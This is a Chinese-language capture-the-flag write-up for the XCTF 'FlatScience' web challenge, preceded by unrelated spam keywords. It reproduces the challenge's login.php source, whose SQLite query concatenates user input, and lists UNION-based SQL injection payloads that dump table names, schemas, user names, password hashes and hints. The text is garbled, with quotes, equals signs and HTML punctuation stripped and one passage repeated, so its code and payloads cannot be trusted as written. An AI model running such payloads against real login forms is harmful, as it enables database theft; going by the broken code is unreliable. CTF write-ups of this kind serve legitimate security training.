备案 网站名,货源之家,设计公司企业分析,wordpress固定设备登录攻防世界38-FlatScience-Web
点开这个here看到一堆pdf,感觉没用#xff0c;扫描一下 试试弱口令先 源码里有#xff1a; 好吧0.0
试试存不存在sql注入
根本没回显#xff0c;转战login.php先
输入1’,发现sql注入 看到提示
访问后得源码
?php
ob_start();
?…攻防世界38-FlatScience-Web
点开这个here看到一堆pdf,感觉没用扫描一下 试试弱口令先 源码里有
好吧0.0
试试存不存在sql注入
根本没回显转战login.php先
输入1’,发现sql注入 看到提示
访问后得源码
?php
ob_start();
?
!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01//ENhtml
head
style
blockquote { background: #eeeeee; }
h1 { border-bottom: solid black 2px; }
h2 { border-bottom: solid black 1px; }
.comment { color: darkgreen; }
/stylemeta http-equivContent-Type contenttext/html; charsetiso-8859-1
titleLogin/title
/head
bodydiv alignright classlastmod
Last Modified: Fri Mar 31:33:7 UTC 1337
/divh1Login/h1Login Page, do not try to hax here plox!brform methodpostID:brinput typetext nameusrbrPassword:br input typetext namepwbrbrinput typesubmit valueSubmit
/form?php
if(isset($_POST[usr]) isset($_POST[pw])){$user $_POST[usr];$pass $_POST[pw];$db new SQLite3(../fancy.db);$res $db-query(SELECT id,name from Users where name.$user. and password.sha1($pass.Salz!).);if($res){$row $res-fetchArray();}else{echo brSome Error occourred!;}if(isset($row[id])){setcookie(name, .$row[name], time() 60, /);header(Location: /);die();}}if(isset($_GET[debug]))
highlight_file(login.php);
?
!-- TODO: Remove ?debug-Parameter! --hr noshade
addressFlux Horst (Flux dot Horst at rub dot flux)/address
/body $db new SQLite3(‘…/fancy.db’);提示是个sqlite注入
payload里注入 返回在右上角 usr union select 1,group_concat(tbl_name) from sqlite_master where typetable--pw //查所有表
usr union select 1,group_concat(sql) from sqlite_master where tbl_nameUsers--pw //查表所有字段
//查所有内容
usr union select 1,group_concat(id) from Users--pw1
usr union select 1,group_concat(name) from Users--pw1
usr union select 1,group_concat(password) from Users--pw1
usr union select 1,group_concat(hint) from Users--pw得到hint下面做不动了
贴一个大佬的wp
oncat(password) from Users–pw1 usr’ union select 1,group_concat(hint) from Users–pw 得到hint下面做不动了贴一个大佬的wp[FlatScience XCTF web进阶区FlatScience详解-CSDN博客](https://blog.csdn.net/weixin_43693550/article/details/120241607?spm1001.2101.3001.6650.2utm_mediumdistribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4depth_1-utm_sourcedistribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4utm_relevant_index5)
